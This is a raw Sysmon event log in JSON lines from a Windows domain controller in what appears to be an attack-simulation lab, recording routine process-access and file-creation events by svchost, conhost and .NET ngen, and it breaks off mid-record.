{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8924,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.873\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1392-5F25-0000-0010DA171000}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.873","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1392-5F25-0000-0010DA171000}","TargetProcessId":"1364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:02.310\r\nProcessGuid: {E2A3D6B1-13A5-5F25-0000-001092DC1000}\r\nProcessId: 4900\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1324-0\\UIAutomationClientsideProviders.dll\r\nCreationUtcTime: 2020-08-01 07:03:02.310","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:02.310","ProcessGuid":"{E2A3D6B1-13A5-5F25-0000-001092DC1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1324-0\\UIAutomationClientsideProviders.dll","CreationUtcTime":"2020-08-01 07:03:02.310","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.357\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010214C0F00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 